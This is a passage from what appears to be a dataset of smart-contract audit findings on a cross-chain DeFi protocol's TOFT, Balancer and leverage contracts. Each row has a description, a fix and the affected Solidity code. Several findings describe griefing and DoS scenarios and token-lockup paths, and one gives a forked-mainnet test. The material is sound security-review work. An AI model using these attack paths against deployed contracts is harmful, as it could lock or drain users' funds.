}\\n```\\n,"Due to the inability to modify `_paused`, it poses a security risk","```\\n function executeModule(ITOFT.Module _module, bytes memory _data, bool _forwardRevert)\\n external\\n payable\\n whenNotPaused\\n returns (bytes memory returnData)\\n {\\n// rest of code\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n public\\n payable\\n whenNotPaused\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n```\\n" +Composing approval with other messages is subject to DoS,medium,"`TOFT::sendPacket` function allows the caller to specify multiple messages that are executed on the destination chain. On the receiving side the `lzCompose` function in `TOFT` contract can be DoS-ed by front-running the approval message and causing the `lzCompose` to revert. As `lzCompose` is supposed to process several messages, this results in lost fee paid on the sending chain for executing the subsequent messages and any value or gas airdropped to the contract.\\n`TOFT::sendPacket` allows the caller to specify arbitrary `_composeMsg`. It can be a single message or multiple composed messages.\\n```\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n public\\n payable\\n whenNotPaused // @audit Pausing is not implemented yet.\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n (msgReceipt, oftReceipt) = abi.decode(\\n _executeModule(\\n uint8(ITOFT.Module.TOFTSender),\\n abi.encodeCall(TapiocaOmnichainSender.sendPacket, (_lzSendParam, _composeMsg)),\\n false\\n ),\\n (MessagingReceipt, OFTReceipt)\\n );\\n }\\n```\\n\\nIf we observe the logic inside the lzCompose:\\n```\\n function _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers.\\n if (msgType_ == MSG_REMOTE_TRANSFER) {\\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_);\\n } else if (!_extExec(msgType_, tapComposeMsg_)) {\\n // Check if the TOE extender is set and the msg type is valid. If so, call the TOE extender to handle msg.\\n if (\\n address(tapiocaOmnichainReceiveExtender) != address(0)\\n && tapiocaOmnichainReceiveExtender.isMsgTypeValid(msgType_)\\n ) {\\n bytes memory callData = abi.encodeWithSelector(\\n ITapiocaOmnichainReceiveExtender.toeComposeReceiver.selector,\\n msgType_,\\n srcChainSender_,\\n tapComposeMsg_\\n );\\n (bool success, bytes memory returnData) =\\n address(tapiocaOmnichainReceiveExtender).delegatecall(callData);\\n if (!success) {\\n revert(_getTOEExtenderRevertMsg(returnData));\\n }\\n } else {\\n // If no TOE extender is set or msg type doesn't match extender, try to call the internal receiver.\\n if (!_toeComposeReceiver(msgType_, srcChainSender_, tapComposeMsg_)) {\\n revert InvalidMsgType(msgType_);\\n }\\n }\\n }\\n\\n emit ComposeReceived(msgType_, _guid, tapComposeMsg_);\\n if (nextMsg_.length > 0) {\\n _lzCompose(address(this), _guid, nextMsg_);\\n }\\n }\\n```\\n\\nAt the beginning of the function bytes memory `tapComposeMsg_` is the message being processed, while `bytes memory nextMsg_` are all the other messages. `lzCompose` will process all the messages until `nextMsg_` is empty.\\nA user might want to have his first message to grant approval, e.g. `_extExec` function call, while his second message might execute `BaseTOFTReceiver::_toeComposeReceiver` with `_msgType == MSG_YB_SEND_SGL_BORROW`.\\nThis is a problem as there is a clear DoS attack vector on granting any approvals. A griever can observe the permit message from the user and front-run the `lzCompose` call and submit the approval on the user's behalf.\\nAs permits use nonce it can't be replayed, which means if anyone front-runs the permit, the original permit will revert. This means that `lzCompose` always reverts and all the gas and value to process the `BaseTOFTReceiver::_toeComposeReceiver` with `_msgType == MSG_YB_SEND_SGL_BORROW` is lost for the user.","`TOFT::sendPacket` should do extra checks to ensure if the message contains approvals, it should not allow packing several messages.","When user is granting approvals and wants to execute any other message in the same `lzCompose` call, the attacker can deny the user from executing the other message by front-running the approval message and causing the `lzCompose` to revert. The impact is lost fee paid on the sending chain for executing the subsequent messages and any value or gas airdropped to the contract. This is especially severe when the user wants to withdraw funds to another chain, as he needs to pay for that fee on the sending chain.","```\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n public\\n payable\\n whenNotPaused // @audit Pausing is not implemented yet.\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n (msgReceipt, oftReceipt) = abi.decode(\\n _executeModule(\\n uint8(ITOFT.Module.TOFTSender),\\n abi.encodeCall(TapiocaOmnichainSender.sendPacket, (_lzSendParam, _composeMsg)),\\n false\\n ),\\n (MessagingReceipt, OFTReceipt)\\n );\\n }\\n```\\n" +StargateRouter cannot send payloads and rebalancing of ERC20s is broken,medium,"The `Balancer.sol` contract can't perform the rebalancing of ERC20s across chains as the Stargate router is not able to send any payload and will immediately revert the transaction if a payload is included. In this instance payload is hardcoded to `""0x""`.\\n`Balancer.sol` contract has a `rebalance` function that is supposed to perform a rebalancing of `mTOFTs` across chains. In case the token being transferred through Stargate is an ERC20 it is using the Stargate router to initiate the transfer. The issue however is that the stargate router is not able to send any payload and will immediately revert the transaction if a payload is included.\\nIf we take a look at the code, there is a payload equal to ""0x"" being sent with the transaction:\\n```\\n## Balancer.sol\\n\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: ""0x0""}),\\n _dst,\\n ""0x"" => this is the payload that is being sent with the transaction\\n );\\n```\\n\\nAs a proof of concept we can try to send a payload through the stargate router on a forked network and see that the transaction will revert. p.s. make sure to run on it on a forked network on Ethereum mainnet.\\n```\\nfunction testStargateRouterReverting() public {\\n vm.createSelectFork(vm.envString(""MAINNET_RPC_URL""));\\n \\n address stargateRouter = 0x8731d54E9D02c286767d56ac03e8037C07e01e98;\\n address DAIWhale = 0x7A8EDc710dDEAdDDB0B539DE83F3a306A621E823;\\n address DAI = 0x6B175474E89094C44Da98b954EedeAC495271d0F;\\n IStargateRouter.lzTxObj memory lzTxParams = IStargateRouter.lzTxObj(0, 0, ""0x00"");\\n\\n vm.startPrank(DAIWhale);\\n vm.deal(DAIWhale, 5 ether);\\n IERC20(DAI).approve(stargateRouter, 1e18);\\n IStargateRouter(stargateRouter).swap{value: 1 ether}(\\n 111, 3, 3, payable(address(this)), 1e18, 1, lzTxParams, abi.encode(address(this)), ""0x""\\n );\\n}\\n```\\n\\nIt fails with the following error:\\nBoth `StargateRouter` and StargateComposer have the `swap` interface, but the intention was to use the `StargateRouter` which can be observed by the `retryRevert` function in the `Balancer.sol` contract.\\n```\\n## Balancer.sol\\n\\nfunction retryRevert(uint16 _srcChainId, bytes calldata _srcAddress, uint256 _nonce) external payable onlyOwner {\\n router.retryRevert{value: msg.value}(_srcChainId, _srcAddress, _nonce);\\n}\\n```\\n\\nAs this makes the rebalancing of `mTOFTs` broken, I'm marking this as a high-severity issue.",Use the `StargateComposer` instead of the `StargateRouter` if sending payloads.,"Rebalancing of `mTOFTs` across chains is broken and as it is one of the main functionalities of the protocol, this is a high-severity issue.","```\\n## Balancer.sol\\n\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: ""0x0""}),\\n _dst,\\n ""0x"" => this is the payload that is being sent with the transaction\\n );\\n```\\n" +`mTOFT` can be forced to receive the wrong ERC20 leading to token lockup,medium,"Due to Stargate's functionality of swapping one token on the source chain to another token on the destination chain, it is possible to force `mTOFT` to receive the wrong ERC20 token leading to token lockup.\\nTo give an example, a user can:\\nProvide USDC on Ethereum and receive USDT on Avalanche.\\nProvide USDC on Avalanche and receive USDT on Arbitrum.\\netc.\\nThe issue here is that poolIds are not enforced during the rebalancing process. As it can be observed the `bytes memory _ercData` is not checked for its content.\\n```\\n## Balancer.sol\\n\\nfunction _sendToken(\\n address payable _oft,\\n uint256 _amount,\\n uint16 _dstChainId,\\n uint256 _slippage,\\n> bytes memory _data\\n ) private {\\n address erc20 = ITOFT(_oft).erc20();\\n if (IERC20Metadata(erc20).balanceOf(address(this)) < _amount) {\\n revert ExceedsBalance();\\n }\\n {\\n> (uint256 _srcPoolId, uint256 _dstPoolId) = abi.decode(_data, (uint256, uint256));\\n _routerSwap(_dstChainId, _srcPoolId, _dstPoolId, _amount, _slippage, _oft, erc20);\\n }\\n }\\n```\\n\\nIt is simply decoded and passed as is.\\nThis is a problem and imagine the following scenario:\\nA Gelato bot calls the rebalance method for `mTOFT` that has USDC as erc20 on Ethereum.\\nThe bot encodes the `ercData` so `srcChainId = 1` pointing to USDC but `dstChainId = 2` pointing to USDT on Avalanche.\\nDestination `mTOFT` is fetched from `connectedOFTs` and points to the `mTOFT` with USDC as erc20 on Avalanche.\\nStargate will take USDC on Ethereum and provide USDT on Avalanche.\\n`mTOFT` with USDC as underlying erc20 on Avalanche will receive USDT token and it will remain lost as the balance of the `mTOFT` contract.\\nAs this is a clear path for locking up wrong tokens inside the `mTOFT` contract, it is a critical issue.","The `initConnectedOFT` function should enforce the poolIds for the src and dst chains.The rebalance function should just fetch these saved values and use them.\\n```\\n \\n@@ // Remove the line below\\n164,14 // Add the line below\\n176,12 @@ contract Balancer is Ownable {\\n * @param _dstChainId the destination LayerZero id\\n * @param _slippage the destination LayerZero id\\n * @param _amount the rebalanced amount\\n// Remove the line below\\n * @param _ercData custom send data\\n */\\n function rebalance(\\n address payable _srcOft,\\n uint16 _dstChainId,\\n uint256 _slippage,\\n// Remove the line below\\n uint256 _amount,\\n// Remove the line below\\n bytes memory _ercData\\n// Add the line below\\n uint256 _amount\\n ) external payable onlyValidDestination(_srcOft, _dstChainId) onlyValidSlippage(_slippage) {\\n {\\n@@ // Remove the line below\\n188,13 // Add the line below\\n204,13 @@ contract Balancer is Ownable {\\n if (msg.value == 0) revert FeeAmountNotSet();\\n if (_isNative) {\\n if (disableEth) revert SwapNotEnabled();\\n _sendNative(_srcOft, _amount, _dstChainId, _slippage);\\n } else {\\n// Remove the line below\\n _sendToken(_srcOft, _amount, _dstChainId, _slippage, _ercData);\\n// Add the line below\\n _sendToken(_srcOft, _amount, _dstChainId, _slippage);\\n }\\n\\n \\n@@ // Remove the line below\\n221,7 // Add the line below\\n237,7 @@ contract Balancer is Ownable {\\n * @param _dstOft the destination TOFT address\\n * @param _ercData custom send data\\n */\\n// Remove the line below\\n function initConnectedOFT(address _srcOft, uint16 _dstChainId, address _dstOft, bytes memory _ercData)\\n// Add the line below\\n function initConnectedOFT(address _srcOft, uint256 poolId, uint16 _dstChainId, address _dstOft, bytes memory _ercData)\\n external\\n onlyOwner\\n {\\n@@ // Remove the line below\\n231,10 // Add the line below\\n247,8 @@ contract Balancer is Ownable {\\n bool isNative = ITOFT(_srcOft).erc20() == address(0);\\n if (!isNative && _ercData.length == 0) revert PoolInfoRequired();\\n \\n// Remove the line below\\n (uint256 _srcPoolId, uint256 _dstPoolId) = abi.decode(_ercData, (uint256, uint256));\\n// Remove the line below\\n\\n OFTData memory oftData =\\n// Remove the line below\\n OFTData({srcPoolId: _srcPoolId, dstPoolId: _dstPoolId, dstOft: _dstOft, rebalanceable: 0});\\n// Add the line below\\n OFTData({srcPoolId: poolId, dstPoolId: poolId, dstOft: _dstOft, rebalanceable: 0});\\n \\n connectedOFTs[_srcOft][_dstChainId] = oftData;\\n emit ConnectedChainUpdated(_srcOft, _dstChainId, _dstOft);\\n \\n function _sendToken(\\n address payable _oft,\\n uint256 _amount,\\n uint16 _dstChainId,\\n// Remove the line below\\n uint256 _slippage,\\n// Remove the line below\\n bytes memory _data\\n// Add the line below\\n uint256 _slippage\\n ) private {\\n address erc20 = ITOFT(_oft).erc20();\\n if (IERC20Metadata(erc20).balanceOf(address(this)) < _amount) {\\n revert ExceedsBalance();\\n// Remove the line below\\n }\\n// Add the line below\\n }\\n {\\n// Remove the line below\\n (uint256 _srcPoolId, uint256 _dstPoolId) = abi.decode(_data, (uint256, uint256));\\n// Remove the line below\\n _routerSwap(_dstChainId, _srcPoolId, _dstPoolId, _amount, _slippage, _oft, erc20);\\n// Add the line below\\n _routerSwap(_dstChainId, _amount, _slippage, _oft, erc20);\\n }\\n }\\n \\n function _routerSwap(\\n uint16 _dstChainId,\\n// Remove the line below\\n uint256 _srcPoolId,\\n// Remove the line below\\n uint256 _dstPoolId,\\n uint256 _amount,\\n uint256 _slippage,\\n address payable _oft,\\n address _erc20\\n ) private {\\n bytes memory _dst = abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft);\\n// Add the line below\\n uint256 poolId = connectedOFTs[_oft][_dstChainId].srcPoolId;\\n IERC20(_erc20).safeApprove(address(router), _amount);\\n router.swap{value: msg.value}(\\n _dstChainId,\\n// Remove the line below\\n _srcPoolId,\\n// Remove the line below\\n _dstPoolId,\\n// Add the line below\\n poolId,\\n// Add the line below\\n poolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n```\\n\\nAdmin is trusted but you can optionally add additional checks inside the `initConnectedOFT` function to ensure that the poolIds are correct for the src and dst mTOFTs.",The impact of this vulnerability is critical. It allows for locking up wrong tokens inside the mTOFT contract causing irreversible loss of funds.,"```\\n## Balancer.sol\\n\\nfunction _sendToken(\\n address payable _oft,\\n uint256 _amount,\\n uint16 _dstChainId,\\n uint256 _slippage,\\n> bytes memory _data\\n ) private {\\n address erc20 = ITOFT(_oft).erc20();\\n if (IERC20Metadata(erc20).balanceOf(address(this)) < _amount) {\\n revert ExceedsBalance();\\n }\\n {\\n> (uint256 _srcPoolId, uint256 _dstPoolId) = abi.decode(_data, (uint256, uint256));\\n _routerSwap(_dstChainId, _srcPoolId, _dstPoolId, _amount, _slippage, _oft, erc20);\\n }\\n }\\n```\\n" +Gas parameters for Stargate swap are hardcoded leading to stuck messages,medium,"The `dstGasForCall` for transferring erc20s through Stargate is hardcoded to 0 in the `Balancer` contract leading to `sgReceive` not being called during Stargate swap. As a consequence, the `sgReceive` has to be manually called to clear the `cachedSwapLookup` mapping, but this can be DoSed due to the fact that the `mTOFT::sgReceive` doesn't validate any of its parameters. This can be exploited to perform a long-term DoS attack.\\nGas parameters for Stargate\\nStargate Swap allows the caller to specify the:\\n`dstGasForCall` which is the gas amount forwarded while calling the `sgReceive` on the destination contract.\\n`dstNativeAmount` and `dstNativeAddr` which is the amount and address where the native token is sent to.\\nInside the `Balancer.sol` contract, the `dstGasForCall` is hardcoded to 0. The `dstGasForCall` gets forwarded from Stargate `Router` into the Stargate `Bridge` contract.\\n```\\n function swap(\\n uint16 _chainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n address payable _refundAddress,\\n Pool.CreditObj memory _c,\\n Pool.SwapObj memory _s,\\n IStargateRouter.lzTxObj memory _lzTxParams, \\n bytes calldata _to,\\n bytes calldata _payload\\n ) external payable onlyRouter {\\n bytes memory payload = abi.encode(TYPE_SWAP_REMOTE, _srcPoolId, _dstPoolId, _lzTxParams.dstGasForCall, _c, _s, _to, _payload);\\n _call(_chainId, TYPE_SWAP_REMOTE, _refundAddress, _lzTxParams, payload);\\n }\\n\\n function _call(\\n uint16 _chainId,\\n uint8 _type,\\n address payable _refundAddress,\\n IStargateRouter.lzTxObj memory _lzTxParams,\\n bytes memory _payload\\n ) internal {\\n bytes memory lzTxParamBuilt = _txParamBuilder(_chainId, _type, _lzTxParams);\\n uint64 nextNonce = layerZeroEndpoint.getOutboundNonce(_chainId, address(this)) + 1;\\n layerZeroEndpoint.send{value: msg.value}(_chainId, bridgeLookup[_chainId], _payload, _refundAddress, address(this), lzTxParamBuilt);\\n emit SendMsg(_type, nextNonce);\\n }\\n```\\n\\nIt gets encoded inside the payload that is sent through the LayerZero message. The payload gets decoded inside the `Bridge::lzReceive` on destination chain. And `dstGasForCall` is forwarded to the `sgReceive` function:\\n```\\n## Bridge.sol\\n\\n function lzReceive(\\n uint16 _srcChainId,\\n bytes memory _srcAddress,\\n uint64 _nonce,\\n bytes memory _payload\\n ) external override {\\n if (functionType == TYPE_SWAP_REMOTE) {\\n (\\n ,\\n uint256 srcPoolId,\\n uint256 dstPoolId,\\n> uint256 dstGasForCall,\\n Pool.CreditObj memory c,\\n Pool.SwapObj memory s,\\n bytes memory to,\\n bytes memory payload\\n ) = abi.decode(_payload, (uint8, uint256, uint256, uint256, Pool.CreditObj, Pool.SwapObj, bytes, bytes));\\n```\\n\\nIf it is zero like in the `Balancer.sol` contract or its value is too small the `sgReceive` will fail, but the payload will be saved in the `cachedSwapLookup` mapping. At the same time the tokens are transferred to the destination contract, which is the `mTOFT`. Now anyone can call the `sgReceive` manually through the `clearCachedSwap` function:\\n```\\n function clearCachedSwap(\\n uint16 _srcChainId,\\n bytes calldata _srcAddress,\\n uint256 _nonce\\n ) external {\\n CachedSwap memory cs = cachedSwapLookup[_srcChainId][_srcAddress][_nonce];\\n require(cs.to != address(0x0), ""Stargate: cache already cleared"");\\n // clear the data\\n cachedSwapLookup[_srcChainId][_srcAddress][_nonce] = CachedSwap(address(0x0), 0, address(0x0), """");\\n IStargateReceiver(cs.to).sgReceive(_srcChainId, _srcAddress, _nonce, cs.token, cs.amountLD, cs.payload);\\n }\\n```\\n\\nAlthough not the intended behavior there seems to be no issue with erc20 token sitting on the `mTOFT` contract for a shorter period of time.\\nsgReceive\\nThis leads to the second issue. The `sgReceive` function interface specifies the `chainId`, `srcAddress`, and `token`.\\nIn the current implementation, the `sgReceive` function doesn't check any of these parameters. In practice this means that anyone can specify the `mTOFT` address as the receiver and initiate Stargate Swap from any chain to the `mTOFT` contract.\\nIn conjunction with the first issue, this opens up the possibility of a DoS attack.\\nLet's imagine the following scenario:\\nRebalancing operation needs to be performed between `mTOFT` on Ethereum and Avalanche that hold `USDC` as the underlying token.\\nRebalancing is initiated from Ethereum but the `sgReceive` on Avalanche fails and 1000 USDCs are sitting on `mTOFT` contract on Avalanche.\\nA griever noticed this and initiated Stargate swap from Ethereum to Avalanche for 1 `USDT` specifying the `mTOFT` contract as the receiver.\\nThis is successful and now `mTOFT` has 1 `USDT` but 999 `USDC` as the griever's transaction has called the `sgRecieve` function that pushed 1 `USDC` to the `TOFTVault`.\\nAs a consequence, the `clearCachedSwap` function fails because it tries to transfer the original 1000 `USDC`.\\n```\\n function sgReceive(uint16, bytes memory, uint256, address, uint256 amountLD, bytes memory) external payable {\\n if (msg.sender != _stargateRouter) revert mTOFT_NotAuthorized();\\n\\n if (erc20 == address(0)) {\\n vault.depositNative{value: amountLD}();\\n } else {\\n> IERC20(erc20).safeTransfer(address(vault), amountLD); // amountLD is the original 1000 USDC\\n }\\n }\\n```\\n\\nThe only solution here is to manually transfer that 1 USDC to the `mTOFT` contract and try calling the `clearCachedSwap` again.\\nThe griever can repeat this process multiple times.","The `dstGasForCall` shouldn't be hardcoded to 0. It should be a configurable value that is set by the admin of the `Balancer` contract.\\nTake into account that this value will be different for different chains.\\nThe recommended solution is:\\n```\\n contract Balancer is Ownable {\\n using SafeERC20 for IERC20;\\n\\n// Add the line below\\n mapping(uint16 => uint256) internal sgReceiveGas;\\n\\n// Add the line below\\n function setSgReceiveGas(uint16 eid, uint256 gas) external onlyOwner {\\n// Add the line below\\n sgReceiveGas[eid] = gas;\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n function getSgReceiveGas(uint16 eid) internal view returns (uint256) {\\n// Add the line below\\n uint256 gas = sgReceiveGas[eid];\\n// Add the line below\\n if (gas == 0) revert();\\n// Add the line below\\n return gas;\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Remove the line below\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: ""0x0""}),\\n// Add the line below\\n IStargateRouterBase.lzTxObj({dstGasForCall: getSgReceiveGas(_dstChainId), dstNativeAmount: 0, dstNativeAddr: ""0x0""}),\\n```\\n",Hardcoding the `dstGasCall` to 0 in conjuction with not checking the `sgReceive` parameters opens up the possibility of a long-term DoS attack.,"```\\n function swap(\\n uint16 _chainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n address payable _refundAddress,\\n Pool.CreditObj memory _c,\\n Pool.SwapObj memory _s,\\n IStargateRouter.lzTxObj memory _lzTxParams, \\n bytes calldata _to,\\n bytes calldata _payload\\n ) external payable onlyRouter {\\n bytes memory payload = abi.encode(TYPE_SWAP_REMOTE, _srcPoolId, _dstPoolId, _lzTxParams.dstGasForCall, _c, _s, _to, _payload);\\n _call(_chainId, TYPE_SWAP_REMOTE, _refundAddress, _lzTxParams, payload);\\n }\\n\\n function _call(\\n uint16 _chainId,\\n uint8 _type,\\n address payable _refundAddress,\\n IStargateRouter.lzTxObj memory _lzTxParams,\\n bytes memory _payload\\n ) internal {\\n bytes memory lzTxParamBuilt = _txParamBuilder(_chainId, _type, _lzTxParams);\\n uint64 nextNonce = layerZeroEndpoint.getOutboundNonce(_chainId, address(this)) + 1;\\n layerZeroEndpoint.send{value: msg.value}(_chainId, bridgeLookup[_chainId], _payload, _refundAddress, address(this), lzTxParamBuilt);\\n emit SendMsg(_type, nextNonce);\\n }\\n```\\n" +`getCollateral` and `getAsset` functions of the AssetTotsDaiLeverageExecutor contract decode data incorrectly,medium,"See vulnerability detail\\nIn AssetTotsDaiLeverageExecutor contract, `getCollateral` function decodes the data before passing it to `_swapAndTransferToSender` function.\\n```\\nSLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData));\\nuint256 daiAmount =\\n _swapAndTransferToSender(false, assetAddress, daiAddress, assetAmountIn, swapData.swapperData);\\n```\\n\\nHowever, `_swapAndTransferToSender` will decode this data again to obtain the swapperData:\\n```\\nfunction _swapAndTransferToSender(\\n bool sendBack,\\n address tokenIn,\\n address tokenOut,\\n uint256 amountIn,\\n bytes memory data\\n) internal returns (uint256 amountOut) {\\n SLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData));\\n // rest of code\\n```\\n\\nThe redundant decoding will cause the data to not align as expected, which is different from `SimpleLeverageExecutor.getCollateral()` function (code snippet)","The AssetTotsDaiLeverageExecutor contract should pass data directly to `_swapAndTransferToSender`, similar to the SimpleLeverageExecutor contract",`getCollateral` and `getAsset` of AssetTotsDaiLeverageExecutor will not work as intended due to incorrectly decoding data.,"```\\nSLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData));\\nuint256 daiAmount =\\n _swapAndTransferToSender(false, assetAddress, daiAddress, assetAmountIn, swapData.swapperData);\\n```\\n" +Balancer using safeApprove may lead to revert.,medium,"When executing `Balancer._routerSwap()`, the `oz` `safeApprove` function is used to set an allowance. Due to the presence of the `convertRate` in the `router`, `Balancer._routerSwap()` rounds down the incoming quantity. This behavior may result in the allowance not being fully use, causing a subsequent execution of `oz.safeApprove()` to revert.\\nThe code snippet for `Balancer._routerSwap()` is as follows:\\n```\\n function _routerSwap(\\n uint16 _dstChainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n uint256 _amount,\\n uint256 _slippage,\\n address payable _oft,\\n address _erc20\\n ) private {\\n bytes memory _dst = abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft);\\n IERC20(_erc20).safeApprove(address(router), _amount);\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: ""0x0""}),\\n _dst,\\n ""0x""\\n );\\n }\\n```\\n\\nIn the above code, `SafeERC20.safeApprove()` from the `oz` library is used, but the allowance is not cleared afterward. Consequently, if the current allowance is not fully use during this transaction, a subsequent execution of `SafeERC20.safeApprove()` will revert.\\n```\\n function swap(\\n uint16 _dstChainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n address payable _refundAddress,\\n uint256 _amountLD,\\n uint256 _minAmountLD,\\n lzTxObj memory _lzTxParams,\\n bytes calldata _to,\\n bytes calldata _payload\\n ) external payable override nonReentrant {\\n require(_amountLD > 0, ""Stargate: cannot swap 0"");\\n require(_refundAddress != address(0x0), ""Stargate: _refundAddress cannot be 0x0"");\\n Pool.SwapObj memory s;\\n Pool.CreditObj memory c;\\n {\\n Pool pool = _getPool(_srcPoolId);\\n {\\n uint256 convertRate = pool.convertRate();\\n _amountLD = _amountLD.div(convertRate).mul(convertRate);\\n }\\n\\n s = pool.swap(_dstChainId, _dstPoolId, msg.sender, _amountLD, _minAmountLD, true);\\n _safeTransferFrom(pool.token(), msg.sender, address(pool), _amountLD);\\n c = pool.sendCredits(_dstChainId, _dstPoolId);\\n }\\n bridge.swap{value: msg.value}(_dstChainId, _srcPoolId, _dstPoolId, _refundAddress, c, s, _lzTxParams, _to, _payload);\\n }\\n```\\n","```\\n function _routerSwap(\\n uint16 _dstChainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n uint256 _amount,\\n uint256 _slippage,\\n address payable _oft,\\n address _erc20\\n ) private {\\n bytes memory _dst = abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft);\\n IERC20(_erc20).safeApprove(address(router), _amount);\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: ""0x0""}),\\n _dst,\\n ""0x""\\n );\\n// Add the line below\\n IERC20(_erc20).safeApprove(address(router), 0);\\n```\\n",Unused allowance may lead to failure in subsequent `_routerSwap()` executions.,"```\\n function _routerSwap(\\n uint16 _dstChainId,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n uint256 _amount,\\n uint256 _slippage,\\n address payable _oft,\\n address _erc20\\n ) private {\\n bytes memory _dst = abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft);\\n IERC20(_erc20).safeApprove(address(router), _amount);\\n router.swap{value: msg.value}(\\n _dstChainId,\\n _srcPoolId,\\n _dstPoolId,\\n payable(this),\\n _amount,\\n _computeMinAmount(_amount, _slippage),\\n IStargateRouterBase.lzTxObj({dstGasForCall: 0, dstNativeAmount: 0, dstNativeAddr: ""0x0""}),\\n _dst,\\n ""0x""\\n );\\n }\\n```\\n" +buyCollateral() does not work properly,medium,"The `BBLeverage.buyCollateral()` function does not work as expected.\\nThe implementation of `BBLeverage.buyCollateral()` is as follows:\\n```\\n function buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n if (address(leverageExecutor) == address(0)) {\\n revert LeverageExecutorNotValid();\\n }\\n\\n // Stack too deep fix\\n _BuyCollateralCalldata memory calldata_;\\n _BuyCollateralMemoryData memory memoryData;\\n {\\n calldata_.from = from;\\n calldata_.borrowAmount = borrowAmount;\\n calldata_.supplyAmount = supplyAmount;\\n calldata_.data = data;\\n }\\n\\n {\\n uint256 supplyShare = yieldBox.toShare(assetId, calldata_.supplyAmount, true);\\n if (supplyShare > 0) {\\n (memoryData.supplyShareToAmount,) =\\n yieldBox.withdraw(assetId, calldata_.from, address(leverageExecutor), 0, supplyShare);\\n }\\n }\\n\\n {\\n (, uint256 borrowShare) = _borrow(\\n calldata_.from,\\n address(this),\\n calldata_.borrowAmount,\\n _computeVariableOpeningFee(calldata_.borrowAmount)\\n );\\n (memoryData.borrowShareToAmount,) =\\n yieldBox.withdraw(assetId, address(this), address(leverageExecutor), 0, borrowShare);\\n }\\n {\\n amountOut = leverageExecutor.getCollateral(\\n collateralId,\\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n uint256 collateralShare = yieldBox.toShare(collateralId, amountOut, false);\\n address(asset).safeApprove(address(yieldBox), type(uint256).max);\\n yieldBox.depositAsset(collateralId, address(this), address(this), 0, collateralShare); // TODO Check for rounding attack?\\n address(asset).safeApprove(address(yieldBox), 0);\\n\\n if (collateralShare == 0) revert CollateralShareNotValid();\\n _allowedBorrow(calldata_.from, collateralShare);\\n _addCollateral(calldata_.from, calldata_.from, false, 0, collateralShare);\\n }\\n```\\n\\nThe code above has several issues:\\n`leverageExecutor.getCollateral()` receiver should be `address(this)`. ---> for 2th step deposit to YB\\n`address(asset).safeApprove()` should use `address(collateral).safeApprove()`.\\n`yieldBox.depositAsset()` receiver should be `calldata_.from`. ----> for next execute addCollateral(calldata.from)\\nNote: SGLLeverage.sol have same issue","```\\n function buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data)\\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from)\\n returns (uint256 amountOut)\\n {\\n// rest of code.\\n\\n {\\n (, uint256 borrowShare) = _borrow(\\n calldata_.from,\\n address(this),\\n calldata_.borrowAmount,\\n _computeVariableOpeningFee(calldata_.borrowAmount)\\n );\\n (memoryData.borrowShareToAmount,) =\\n yieldBox.withdraw(assetId, address(this), address(leverageExecutor), 0, borrowShare);\\n }\\n {\\n amountOut = leverageExecutor.getCollateral(\\n collateralId,\\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount // Add the line below\\n memoryData.borrowShareToAmount,\\n// Remove the line below\\n calldata_.from,\\n// Add the line below\\n address(this),\\n 